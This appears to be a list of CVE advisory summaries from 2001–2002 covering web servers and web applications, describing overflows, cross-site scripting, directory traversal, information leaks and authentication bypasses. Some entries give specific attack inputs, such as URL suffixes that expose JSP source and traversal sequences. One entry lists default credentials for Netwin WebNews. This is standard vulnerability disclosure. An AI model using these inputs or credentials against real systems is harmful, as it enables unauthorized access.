[CVE-2002-0700] Buffer overflow in a system function that performs user authentication for Microsoft Content Management Server (MCMS) 2001 allows attackers to execute code in the Local System context by authenticating to a web page that calls the function, aka "Unchecked Buffer in MDAC Function Could Enable SQL Server Compromise."
[CVE-2002-0692] Buffer overflow in SmartHTML Interpreter (shtml.dll) in Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to cause a denial of service (CPU consumption) or run arbitrary code, respectively, via a certain type of web file request.
[CVE-2002-0687] The "through the web code" capability for Zope 2.0 through 2.5.1 b1 allows untrusted users to shut down the Zope server via certain headers.
[CVE-2002-0686] Buffer overflow in the search component for iPlanet Web Server (iWS) 4.1 and Sun ONE Web Server 6.0 allows remote attackers to execute arbitrary code via a long argument to the NS-rel-doc-name parameter.
[CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
[CVE-2002-0681] Cross-site scripting vulnerability in GoAhead Web Server 2.1 allows remote attackers to execute script as other web users via script in a URL that generates a "404 not found" message, which does not quote the script.
[CVE-2002-0680] Directory traversal vulnerability in GoAhead Web Server 2.1 allows remote attackers to read arbitrary files via a URL with an encoded / (%5C) in a .. (dot dot) sequence. NOTE: it is highly likely that this candidate will be REJECTED because it has been reported to be a duplicate of CVE-2001-0228.
[CVE-2002-0671] Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 downloads phone applications from a web site but can not verify the integrity of the applications, which could allow remote attackers to install Trojan horse applications via DNS spoofing.
[CVE-2002-0627] The Web server for Polycom ViewStation before 7.2.4 allows remote attackers to bypass authentication and read files via Unicode encoded requests.
[CVE-2002-0622] The Office Web Components (OWC) package installer for Microsoft Commerce Server 2000 allows remote attackers to execute commands by passing the commands as input to the OWC package installer, aka "OWC Package Command Execution".
[CVE-2002-0621] Buffer overflow in the Office Web Components (OWC) package installer used by Microsoft Commerce Server 2000 allows remote attackers to cause the process to fail or run arbitrary code in the LocalSystem security context via certain input to the OWC package installer.
[CVE-2002-0614] PHP-Survey 20000615 and earlier stores the global.inc file under the web root, which allows remote attackers to obtain sensitive information, including database credentials, if .inc files are not preprocessed by the server.
[CVE-2002-0602] Snapgear Lite+ firewall 1.5.4 and 1.5.3 allows remote attackers to cause a denial of service (crash) via a large number of connections to (1) the HTTP web management port, or (2) the PPTP port.
[CVE-2002-0596] WebTrends Reporting Center 4.0d allows remote attackers to determine the real path of the web server via a GET request to get_od_toc.pl with an empty Profile parameter, which leaks the pathname in an error message.
[CVE-2002-0595] Buffer overflow in WTRS_UI.EXE (WTX_REMOTE.DLL) for WebTrends Reporting Center 4.0d allows remote attackers to execute arbitrary code via a long HTTP GET request to the /reports/ directory.
[CVE-2002-0578] Buffer overflow in 4D WebServer 6.7.3 allows remote attackers to cause a denial of service and possibly execute arbitrary code via an HTTP request with Basic Authentication containing a long (1) user name or (2) password.
[CVE-2002-0565] Oracle 9iAS 1.0.2.x compiles JSP files in the _pages directory with world-readable permissions under the web root, which allows remote attackers to obtain sensitive information derived from the JSP code, including usernames and passwords, via a direct HTTP request to _pages.
[CVE-2002-0562] The default configuration of Oracle 9i Application Server 1.0.2.x running Oracle JSP or SQLJSP stores globals.jsa under the web root, which allows remote attackers to gain sensitive information including usernames and passwords via a direct HTTP request to globals.jsa.
[CVE-2002-0555] IBM Informix Web DataBlade 4.12 unescapes user input even if an application has escaped it, which could allow remote attackers to execute SQL code in a web form even when the developer has attempted to escape it.
[CVE-2002-0554] webdriver in IBM Informix Web DataBlade 4.12 allows remote attackers to bypass user access levels or read arbitrary files via a SQL injection attack in an HTTP request.
[CVE-2002-0544] Aprelium Abyss Web Server (abyssws) before 1.0.3 stores the administrative console password in plaintext in the abyss.conf file, which allows local users with access to the file to gain privileges.
[CVE-2002-0543] Directory traversal vulnerability in Aprelium Abyss Web Server (abyssws) before 1.0.0.2 allows remote attackers to read files outside the web root, including the abyss.conf file, via URL-encoded .. (dot dot) sequences in the HTTP request.
[CVE-2002-0537] The admin.html file in StepWeb Search Engine (SWS) 2.5 stores passwords in links to manager.pl, which allows remote attackers who can access the admin.html file to gain administrative privileges to SWS.
[CVE-2002-0532] EMU Webmail allows local users to execute arbitrary programs via a .. (dot dot) in the HTTP Host header that points to a Trojan horse configuration file that contains a pageroot specifier that contains shell metacharacters.
[CVE-2002-0531] Directory traversal vulnerability in emumail.cgi in EMU Webmail 4.5.x and 5.1.0 allows remote attackers to read arbitrary files or list arbitrary directories via a .. (dot dot) in the type parameter.
[CVE-2002-0530] Cross-site scripting vulnerability in Novell Web Search 2.0.1 allows remote attackers to execute arbitrary script as other Web Search users via the search parameter.
[CVE-2002-0521] Cross-site scripting vulnerabilities in ASP-Nuke RC2 and earlier allow remote attackers to execute script or gain privileges as other ASP-Nuke users via script in (1) the name parameter in downloads.asp, (2) the message parameter in Post.asp, or (3) a web site URL in profile.asp.
[CVE-2002-0507] An interaction between Microsoft Outlook Web Access (OWA) with RSA SecurID allows local users to bypass the SecurID authentication for a previous user via several submissions of an OWA Authentication request with the proper OWA password for the previous user, which is eventually accepted by OWA.
[CVE-2002-0494] Cross-site scripting vulnerability in WebSight Directory System 0.1 allows remote attackers to execute arbitrary Javascript and gain access to the WebSight administrator via a new link submission containing the script in a website name.
[CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
[CVE-2002-0490] Instant Web Mail before 0.60 does not properly filter CR/LF sequences, which allows remote attackers to (1) execute arbitrary POP commands via the id parameter in message.php, or (2) modify certain mail message headers via numerous parameters in write.php.
[CVE-2002-0483] index.php for PHP-Nuke 5.4 and earlier allows remote attackers to determine the physical pathname of the web server when the file parameter is set to index.php, which triggers an error message that leaks the pathname.
[CVE-2002-0482] Directory traversal vulnerability in PCI Netsupport Manager before version 7, when running web extensions, allows remote attackers to read arbitrary files via a .. (dot dot) in the HTTP GET request.
[CVE-2002-0475] Cross-site scripting vulnerability in phpBB 1.4.4 and earlier allows remote attackers to execute arbitrary Javascript on web clients by embedding the script within an IMG image tag while editing a message.
[CVE-2002-0474] Cross-site scripting vulnerability in ZeroForum allows remote attackers to execute arbitrary Javascript on web clients by embedding the script within IMG image tag.
[CVE-2002-0466] Hosting Controller 1.4.1 and earlier allows remote attackers to browse arbitrary directories via a full C: style pathname in the filepath arguments to (1) Statsbrowse.asp, (2) servubrowse.asp, (3) browsedisk.asp, (4) browsewebalizerexe.asp, or (5) sqlbrowse.asp.
[CVE-2002-0463] home.php in ARSC (Really Simple Chat) 1.0.1 and earlier allows remote attackers to determine the full pathname of the web server via an invalid language in the arsc_language parameter, which leaks the pathname in an error message.
[CVE-2002-0462] bigsam_guestbook.php for Big Sam (Built-In Guestbook Stand-Alone Module) 1.1.08 and earlier allows remote attackers to cause a denial of service (CPU consumption) or obtain the absolute path of the web server via a displayBegin parameter with a very large number, which leaks the web path in an error message when PHP safe_mode is enabled, or consumes resources when safe_mode is not enabled.
[CVE-2002-0461] Internet Explorer 5.01 through 6 allows remote attackers to cause a denial of service (application crash) via Javascript in a web page that calls location.replace on itself, causing a loop.
[CVE-2002-0459] Cross-site scripting vulnerability in Board-TNK 1.3.1 and earlier allows remote attackers to execute arbitrary Javascript via the WEB parameter.
[CVE-2002-0458] Cross-site scripting vulnerability in News-TNK 1.2.1 and earlier allows remote attackers to execute arbitrary Javascript via the WEB parameter.
[CVE-2002-0450] Buffer overflow in Talentsoft Web+ 5.0 and earlier allows remote attackers to execute arbitrary code via a long Web Markup Language (wml) file name to (1) webplus.dll or (2) webplus.exe.
[CVE-2002-0449] Buffer overflow in webpsvc.exe for Talentsoft Web+ 5.0 and earlier allows remote attackers to execute arbitrary code via a long argument to the webplus.exe program, which triggers the overflow in webpsvc.exe.
[CVE-2002-0448] Xerver Free Web Server 2.10 and earlier allows remote attackers to cause a denial of service (crash) via an HTTP request that contains many "C:/" sequences.
[CVE-2002-0447] Directory traversal vulnerability in Xerver Free Web Server 2.10 and earlier allows remote attackers to list arbitrary directories via a .. (dot dot) in an HTTP GET request.
[CVE-2002-0446] categorie.php3 in Black Tie Project (BTP) 0.4b through 0.5b allows remote attackers to determine the absolute path of the web server via an invalid category ID (cid) parameter, which leaks the pathname in an error message.
[CVE-2002-0440] Trend Micro InterScan VirusWall HTTP proxy 3.6 with the "Skip scanning if Content-length equals 0" option enabled allows malicious web servers to bypass content scanning via a Content-length header set to 0, which is often ignored by HTTP clients.
[CVE-2002-0438] ZyXEL ZyWALL 10 before 3.50 allows remote attackers to cause a denial of service via an ARP packet with the firewall's IP address and an incorrect MAC address, which causes the firewall to disable the LAN interface.
[CVE-2002-0433] Pi3Web 2.0.0 allows remote attackers to view restricted files via an HTTP request containing a "*" (wildcard or asterisk) character.
[CVE-2002-0430] MultiFileUploadHandler.php in the Sun Cobalt RaQ XTR administration interface allows local users to bypass authentication and overwrite arbitrary files via a symlink attack on a temporary file, followed by a request to MultiFileUpload.php.
[CVE-2002-0429] The iBCS routines in arch/i386/kernel/traps.c for Linux kernels 2.4.18 and earlier on x86 systems allow local users to kill arbitrary processes via a binary compatibility interface (lcall).
[CVE-2002-0422] IIS 5 and 5.1 supporting WebDAV methods allows remote attackers to determine the internal IP address of the system (which may be obscured by NAT) via (1) a PROPFIND HTTP request with a blank Host header, which leaks the address in an HREF property in a 207 Multi-Status response, or (2) via the WRITE or MKCOL method, which leaks the IP in the Location server header.
[CVE-2002-0415] Directory traversal vulnerability in the web server used in RealPlayer 6.0.7, and possibly other versions, may allow local users to read files that are accessible to RealPlayer via a .. (dot dot) in an HTTP GET request to port 1275.
[CVE-2002-0396] The web management server for Red-M 1050 (Bluetooth Access Point) does not use session-based credentials to authenticate users, which allows attackers to connect to the server from the same IP address as a user who has already established a session.
[CVE-2002-0386] The administration module for Oracle Web Cache in Oracle9iAS (9i Application Suite) 9.0.2 allows remote attackers to cause a denial of service (crash) via (1) an HTTP GET request containing a ".." (dot dot) sequence, or (2) a malformed HTTP GET request with a chunked Transfer-Encoding with missing data.
[CVE-2002-0377] Gaim 0.57 stores sensitive information in world-readable and group-writable files in the /tmp directory, which allows local users to access MSN web email accounts of other users who run Gaim by reading authentication information from the files.
[CVE-2002-0364] Buffer overflow in the chunked encoding transfer mechanism in IIS 4.0 and 5.0 allows attackers to execute arbitrary code via the processing of HTR request sessions, aka "Heap Overrun in HTR Chunked Encoding Could Enable Web Server Compromise."
[CVE-2002-0347] Directory traversal vulnerability in Cobalt RAQ 4 allows remote attackers to read password-protected files, and possibly files outside the web root, via a .. (dot dot) in an HTTP request.
[CVE-2002-0341] GWWEB.EXE in GroupWise Web Access 5.5, and possibly other versions, allows remote attackers to determine the full pathname of the web server via an HTTP request with an invalid HTMLVER parameter.
[CVE-2002-0335] Buffer overflow in Galacticomm Worldgroup web server 3.20 and earlier allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long HTTP GET request.
[CVE-2002-0324] Greymatter 1.21c and earlier with the Bookmarklet feature enabled allows remote attackers to read a cleartext password and gain administrative privileges by guessing the name of a gmrightclick-*.reg file which contains the administrator name and password in cleartext, then retrieving the file from the web server before the Greymatter administrator performs a "Clear And Exit" action.
[CVE-2002-0323] comment2.jse in ScriptEase:WebServer allows remote attackers to read arbitrary files by specifying the target file as an argument in the URL.
[CVE-2002-0317] Gator ActiveX component (IEGator.dll) 3.0.6.1 allows remote web sites to install arbitrary software by specifying a Trojan Gator installation file (setup.ex_) in the src parameter.
[CVE-2002-0313] Buffer overflow in Essentia Web Server 2.1 allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long URL.
[CVE-2002-0312] Directory traversal vulnerability in Essentia Web Server 2.1 allows remote attackers to read arbitrary files via a .. (dot dot) in a URL.
[CVE-2002-0311] Vulnerability in webtop in UnixWare 7.1.1 and Open UNIX 8.0.0 allows local and possibly remote attackers to gain root privileges via shell metacharacters in the -c argument for (1) in scoadminreg.cgi or (2) service_action.cgi.
[CVE-2002-0310] Netwin WebNews 1.1k CGI program includes several default usernames and cleartext passwords that cannot be deleted by the administrator, which allows remote attackers to gain privileges via the username/password combinations (1) testweb/newstest, (2) alwn3845/imaptest, (3) alwi3845/wtest3452, or (4) testweb2/wtest4879.
[CVE-2002-0309] SMTP proxy in Symantec Enterprise Firewall (SEF) 6.5.x includes the firewall's physical interface name and address in an SMTP protocol exchange when NAT translation is made to an address other than the firewall, which could allow remote attackers to determine certain firewall configuration information.
[CVE-2002-0298] ScriptEase MiniWeb Server 0.95 allows remote attackers to cause a denial of service (crash) via certain HTTP GET requests containing (1) a %2e%2e (encoded dot-dot), (2) several /../ (dot dot) sequences, (3) a missing URI, or (4) several ../ in a URI that does not begin with a / (slash) character.
[CVE-2002-0297] Buffer overflow in ScriptEase MiniWeb Server 0.95 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long URL in an HTTP request.
[CVE-2002-0291] Dino's Webserver 1.2 allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via several large HTTP requests within a short time.
[CVE-2002-0290] Buffer overflow in Netwin WebNews CGI program 1.1, Webnews.exe, allows remote attackers to execute arbitrary code via a long group argument.
[CVE-2002-0289] Buffer overflow in Phusion web server 1.0 allows remote attackers to cause a denial of service and execute arbitrary code via a long HTTP request.
[CVE-2002-0288] Directory traversal vulnerability in Phusion web server 1.0 allows remote attackers to read arbitrary files via a ... (triple dot dot) in the HTTP request.
[CVE-2002-0284] Winamp 2.78 and 2.77, when opening a wma file that requires a license, sends the full path of the Temporary Internet Files directory to the web page that is processing the license, which could allow malicious web servers to obtain the pathname.
[CVE-2002-0275] Falcon web server 2.0.0.1020 and earlier allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL.
[CVE-2002-0270] Opera, when configured with the "Determine action by MIME type" option disabled, interprets an object as an HTML document even when its MIME Content-Type is text/plain, which could allow remote attackers to execute arbitrary script in documents that the user does not expect, possibly through web applications that use a text/plain type to prevent cross-site scripting attacks.
[CVE-2002-0269] Internet Explorer 5.x and 6 interprets an object as an HTML document even when its MIME Content-Type is text/plain, which could allow remote attackers to execute arbitrary script in documents that the user does not expect, possibly through web applications that use a text/plain type to prevent cross-site scripting attacks.
[CVE-2002-0266] Thunderstone Texis CGI script allows remote attackers to obtain the full path of the web root via a request for a nonexistent file, which generates an error message that includes the full pathname.
[CVE-2002-0262] Directory traversal vulnerability in netget for Sybex E-Trainer web server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
[CVE-2002-0258] Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs.
[CVE-2002-0252] Buffer overflow in Apple QuickTime Player 5.01 and 5.02 allows remote web servers to execute arbitrary code via a response containing a long Content-Type MIME header.
[CVE-2002-0250] Web configuration utility in HP AdvanceStack hubs J3200A through J3210A with firmware version A.03.07 and earlier, allows unauthorized users to bypass authentication via a direct HTTP request to the web_access.html file, which allows the user to change the switch's configuration and modify the administrator password.
[CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
[CVE-2002-0233] Directory traversal vulnerability in eshare Expressions 4 Web server allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP request.
[CVE-2002-0228] Microsoft MSN Messenger allows remote attackers to use Javascript that references an ActiveX object to obtain sensitive information such as display names and web site navigation, and possibly more when the user is connected to certain Microsoft sites (or DNS-spoofed sites).
[CVE-2002-0217] Cross-site scripting (CSS) vulnerabilities in the Private Message System for XOOPS 1.0 RC1 allow remote attackers to execute Javascript on other web clients via (1) the Title field or a Private Message Box or (2) the image field parameter in pmlite.php.
[CVE-2002-0209] Nortel Alteon ACEdirector WebOS 9.0, with the Server Load Balancing (SLB) and Cookie-Based Persistence features enabled, allows remote attackers to determine the real IP address of a web server with a half-closed session, which causes ACEdirector to send packets from the server without changing the address to the virtual IP address.
[CVE-2002-0203] ttawebtop.cgi in Tarantella Enterprise 3.20 on SPARC Solaris and Linux, and 3.1x and 3.0x including 3.11.903, allows remote attackers to view directory contents via an empty pg parameter.
[CVE-2002-0201] Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.
[CVE-2002-0200] Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.
[CVE-2002-0196] GetRelativePath in ACD Incorporated CwpAPI 1.1 only verifies if the server root is somewhere within the path, which could allow remote attackers to read or write files outside of the web root, in other directories whose path includes the web root.
[CVE-2002-0190] Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to execute arbitrary code under fewer security restrictions via a malformed web page that requires NetBIOS connectivity, aka "Zone Spoofing through Malformed Web Page" vulnerability.
[CVE-2002-0181] Cross-site scripting vulnerability in status.php3 for IMP 2.2.8 and HORDE 1.2.7 allows remote attackers to execute arbitrary web script and steal cookies of other IMP/HORDE users via the script parameter.
[CVE-2002-0180] Buffer overflow in Webalizer 2.01-06, when configured to use reverse DNS lookups, allows remote attackers to execute arbitrary code by connecting to the monitored web server from an IP address that resolves to a long hostname.
[CVE-2002-0166] Cross-site scripting vulnerability in analog before 5.22 allows remote attackers to execute Javascript via an HTTP request containing the script, which is entered into a web logfile and not properly filtered by analog during display.
[CVE-2002-0160] The administration function in Cisco Secure Access Control Server (ACS) for Windows, 2.6.x and earlier and 3.x through 3.01 (build 40), allows remote attackers to read HTML, Java class, and image files outside the web root via a ..\.. (modified ..) in the URL to port 2002.
[CVE-2002-0142] CGI handler in John Roy Pi3Web for Windows 2.0 beta 1 and 2 allows remote attackers to cause a denial of service (crash) via a series of requests whose physical path is exactly 260 characters long and ends in a series of . (dot) characters.
[CVE-2002-0136] Microsoft Internet Explorer 5.5 on Windows 98 allows remote web pages to cause a denial of service (hang) via extremely long values for form fields such as INPUT and TEXTAREA, which can be automatically filled via Javascript.
[CVE-2002-0131] ActivePython ActiveX control for Python in the AXScript package, when used in Internet Explorer, does not prevent a script from reading files from the client's filesystem, which allows remote attackers to read arbitrary files via a malicious web page containing Python script.
[CVE-2002-0127] Netgear RP114 Cable/DSL Web Safe Router Firmware 3.26, when configured to block traffic below port 1024, allows remote attackers to cause a denial of service (hang) via a port scan of the WAN port.
[CVE-2002-0124] MDG Computer Services Web Server 4D/eCommerce 3.5.3 allows remote attackers to exploit directory traversal vulnerability via a ../ (dot dot) containing URL-encoded slashes in the HTTP request.
[CVE-2002-0123] MDG Computer Services Web Server 4D WS4D/eCommerce 3.0 and earlier, and possibly 3.5.3, allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long HTTP request.
[CVE-2002-0121] PHP 4.0 through 4.1.1 stores session IDs in temporary files whose name contains the session ID, which allows local users to hijack web connections.
[CVE-2002-0111] Directory traversal vulnerability in Funsoft Dino's Webserver 1.2 and earlier allows remote attackers to read files or execute arbitrary commands via a .. (dot dot) in the URL.
[CVE-2002-0106] BEA Systems Weblogic Server 6.1 allows remote attackers to cause a denial of service via a series of requests to .JSP files that contain an MS-DOS device name.
[CVE-2002-0103] An installer program for Oracle9iAS Web Cache 2.0.0.x creates executable and configuration files with insecure permissions, which allows local users to gain privileges by (1) running webcached or (2) obtaining the administrator password from webcache.xml.
[CVE-2002-0102] Oracle9iAS Web Cache 2.0.0.x allows remote attackers to cause a denial of service via (1) a request to TCP ports 1100, 4000, 4001, and 4002 with a large number of null characters, and (2) a request to TCP port 4000 with a large number of "." characters.
[CVE-2002-0099] Buffer overflow in Michael Lamont Savant Web Server 3.0 allows remote attackers to cause a denial of service (crash) via a long HTTP request to the cgi-bin directory in which the CGI program name contains a large number of . (dot) characters.
[CVE-2002-0098] Buffer overflow in index.cgi administration interface for Boozt! Standard 0.9.8 allows local users to execute arbitrary code via a long name field when creating a new banner.
[CVE-2002-0075] Cross-site scripting vulnerability for Internet Information Server (IIS) 4.0, 5.0 and 5.1 allows remote attackers to execute arbitrary script as other web users via the error message used in a URL redirect ("302 Object Moved") message.
[CVE-2002-0058] Vulnerability in Java Runtime Environment (JRE) allows remote malicious web sites to hijack or sniff a web client's sessions, when an HTTP proxy is being used, via a Java applet that redirects the session to another server, as seen in (1) Netscape 6.0 through 6.1 and 4.79 and earlier, (2) Microsoft VM build 3802 and earlier as used in Internet Explorer 4.x and 5.x, and possibly other implementations that use vulnerable versions of SDK or JDK.
[CVE-2002-0022] Buffer overflow in the implementation of an HTML directive in mshtml.dll in Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code via a web page that specifies embedded ActiveX controls in a way that causes 2 Unicode strings to be concatenated.
[CVE-2001-1575] Apple Personal Web Sharing (PWS) 1.1, 1.5, and 1.5.5, when Web Sharing authentication is enabled, allows remote attackers to cause a denial of service via a long password, possibly due to a buffer overflow.
[CVE-2001-1560] Win32k.sys (aka Graphics Device Interface (GDI)) in Windows 2000 and XP allows local users to cause a denial of service (system crash) by calling the ShowWindow function after receiving a WM_NCCREATE message.
[CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and do not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
[CVE-2001-1544] Directory traversal vulnerability in Macromedia JRun Web Server (JWS) 2.3.3, 3.0 and 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the HTTP GET request.
[CVE-2001-1542] NAI WebShield SMTP 4.5 and possibly 4.5 MR1a does not filter improperly MIME-encoded email attachments, which could allow remote attackers to bypass filtering and possibly execute arbitrary code in email clients that process the invalid attachments.
[CVE-2001-1537] The default "basic" security setting in config.php for TWIG webmail 2.7.4 and earlier stores cleartext usernames and passwords in cookies, which could allow attackers to obtain authentication information and gain privileges.
[CVE-2001-1532] WebX stores authentication information in the HTTP_REFERER variable, which is included in URL links within bulletin board messages posted by users, which could allow remote attackers to hijack user sessions.
[CVE-2001-1530] run.cgi in Webmin 0.80 and 0.88 creates temporary files with world-writable permissions, which allows local users to execute arbitrary commands.
[CVE-2001-1526] Cross-site scripting (XSS) vulnerability in the comments action in index.php in easyNews 1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the zeit parameter.
[CVE-2001-1524] Cross-site scripting (XSS) vulnerability in PHP-Nuke 5.3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) uname parameter in user.php, (2) ttitle, letter and file parameters in modules.php, (3) subject, story and storyext parameters in submit.php, (4) upload parameter in admin.php and (5) fname parameter in friend.php.
[CVE-2001-1523] Cross-site scripting (XSS) vulnerability in the DMOZGateway module for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via the topic parameter.
[CVE-2001-1522] Cross-site scripting (XSS) vulnerability in im.php in IMessenger for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via a message.
[CVE-2001-1521] Cross-site scripting (XSS) vulnerability in user.php in PostNuke 0.64 allows remote attackers to inject arbitrary web script or HTML via the uname parameter.
[CVE-2001-1516] Cross-site scripting (XSS) vulnerability in phpReview 0.9.0 rc2 and earlier allows remote attackers to inject arbitrary web script or HTML via user-submitted reviews.
[CVE-2001-1513] Macromedia JRun 3.0 and 3.1 allows remote attackers to obtain duplicate active user session IDs and perform actions as other users via a URL request for the web application directory without the trailing '/' (slash), as demonstrated using ctx.
[CVE-2001-1512] Unknown vulnerability in Allaire JRun 3.1 allows remote attackers to directly access the WEB-INF and META-INF directories and execute arbitrary JavaServer Pages (JSP), a variant of CVE-2000-1050.
[CVE-2001-1511] JRun 3.0 and 3.1 running on JRun Web Server (JWS) and IIS allows remote attackers to read arbitrary JavaServer Pages (JSP) source code via a request URL containing the source filename ending in (1) "jsp%00" or (2) "js%2570".
[CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
[CVE-2001-1502] webcart.cgi in Mountain Network Systems WebCart 8.4 allows remote attackers to execute arbitrary commands via shell metacharacters in the NEXTPAGE parameter.
[CVE-2001-1491] Opera 5.11 allows remote attackers to cause a denial of service (CPU consumption and memory leak) via a web page with a large number of images.
[CVE-2001-1490] Mozilla 0.9.6 allows remote attackers to cause a denial of service (CPU consumption and memory leak) via a web page with a large number of images.
[CVE-2001-1489] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (CPU consumption and memory leak) via a web page with a large number of images.
[CVE-2001-1468] PHP remote file inclusion vulnerability in checklogin.php in phpSecurePages 0.24 and earlier allows remote attackers to execute arbitrary PHP code by modifying the cfgProgDir parameter to reference a URL on a remote web server that contains the code.
[CVE-2001-1462] WebID in RSA Security SecurID 5.0 as used by ACE/Agent for Windows, Windows NT and Windows 2000 allows attackers to cause the WebID agent to enter debug mode via a URL containing null characters, which may allow attackers to obtain sensitive information.
[CVE-2001-1461] Directory traversal vulnerability in WebID in RSA Security SecurID 5.0 as used by ACE/Agent for Windows, Windows NT and Windows 2000 allows attackers to access restricted resources via URL-encoded (1) /.. or (2) \.. sequences.
[CVE-2001-1458] Directory traversal vulnerability in Novell GroupWise 5.5 and 6.0 allows remote attackers to read arbitrary files via a request for /servlet/webacc?User.html= that contains "../" (dot dot) sequences and a null character.
[CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
[CVE-2001-1446] Find-By-Content in Mac OS X 10.0 through 10.0.4 creates world-readable index files named .FBCIndex in every directory, which allows remote attackers to learn the contents of files in web accessible directories.
[CVE-2001-1437] easyScripts easyNews 1.5 allows remote attackers to obtain the full path of the web root via a view request with a non-integer news message id field, which leaks the path in a PHP error message when the script times out.
[CVE-2001-1433] Cherokee web server before 0.2.7 does not properly drop root privileges after binding to port 80, which could allow remote attackers to gain privileges via other vulnerabilities.
[CVE-2001-1432] Directory traversal vulnerability in Cherokee Web Server allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
[CVE-2001-1416] Multiple cross-site scripting (XSS) vulnerabilities in the log messages in certain Alpha versions of AOL Instant Messenger (AIM) 4.4 allow remote attackers to execute arbitrary web script or HTML via an image in the (1) DATA, (2) STYLE, or (3) BINARY tags.
[CVE-2001-1408] Directory traversal vulnerability in readmsg.php in WebMail 2.0.1 in Cobalt Qube 3 allows remote attackers to read arbitrary files via a .. (dot dot) in the mailbox parameter.
[CVE-2001-1403] Bugzilla before 2.14 includes the username and password in URLs, which could allow attackers to gain privileges by reading the information from the web server logs, or by "shoulder-surfing" and observing the web browser's location bar.
[CVE-2001-1368] Vulnerability in iPlanet Web Server 4 included in Virtualvault Operating System (VVOS) 4.0 running HP-UX 11.04 could allow attackers to corrupt data.
[CVE-2001-1363] Vulnerability in phpWebSite before 0.7.9 related to running multiple instances in the same domain, which may allow attackers to gain administrative privileges.
[CVE-2001-1361] Vulnerability in The Web Information Gateway (TWIG) 2.7.1, possibly related to incorrect security rights and/or the generation of mailto links.
[CVE-2001-1352] Cross-site scripting vulnerability in Namazu 2.0.9 and earlier allows remote attackers to execute arbitrary Javascript as other web users via an error message that is returned when an invalid index file is specified in the idxname parameter.
[CVE-2001-1351] Cross-site scripting vulnerability in Namazu 2.0.8 and earlier allows remote attackers to execute arbitrary Javascript as other web users via the index file name that is displayed when displaying hit numbers.
[CVE-2001-1350] Cross-site scripting vulnerability in namazu.cgi for Namazu 2.0.7 and earlier allows remote attackers to execute arbitrary Javascript as other web users via the lang parameter.
[CVE-2001-1344] WSSecurity.pl in WebStore allows remote attackers to bypass authentication by providing the program with a filename that exists, which is made easier by (1) inserting a null character or (2) .. (dot dot).
[CVE-2001-1343] ws_mail.cgi in WebStore 400/400CS 4.14 allows remote authenticated WebStore administrators to execute arbitrary code via shell metacharacters in the kill parameter.
[CVE-2001-1341] The Beck GmbH IPC@Chip embedded web server installs the chipcfg.cgi program by default, which allows remote attackers to obtain sensitive network information via a request to the program.
[CVE-2001-1337] Beck IPC GmbH IPC@CHIP Embedded-Webserver allows remote attackers to cause a denial of service via a long HTTP request.
[CVE-2001-1305] ICQ 2001a Alpha and earlier allows remote attackers to automatically add arbitrary UINs to an ICQ user's contact list via a URL to a web page with a Content-Type of application/x-icq, which is processed by Internet Explorer.
[CVE-2001-1302] The change password option in the Windows Security interface for Windows 2000 allows attackers to use the option to attempt to change passwords of other users on other systems or identify valid accounts by monitoring error messages, possibly due to a problem in the NetuserChangePassword function.
[CVE-2001-1299] Zorbat Zorbstats PHP script before 0.9 allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
[CVE-2001-1298] Webodex PHP script 1.0 and earlier allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
[CVE-2001-1296] More.groupware PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
[CVE-2001-1293] Buffer overflow in web server of 3com HomeConnect Cable Modem External with USB (#3CR29223) allows remote attackers to cause a denial of service (crash) via a long HTTP request.
[CVE-2001-1287] Buffer overflow in Web Calendar in Ipswitch IMail 7.04 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
[CVE-2001-1281] Web Messaging Server for Ipswitch IMail 7.04 and earlier allows remote authenticated users to change information for other users by modifying the olduser parameter in the "Change User Information" web form.
[CVE-2001-1254] Web Access component for COM2001 Alexis 2.0 and 2.1 in InternetPBX sends username and voice mail passwords in the clear via a Java applet that sends the information to port 8888 of the server, which could allow remote attackers to steal the passwords via sniffing.
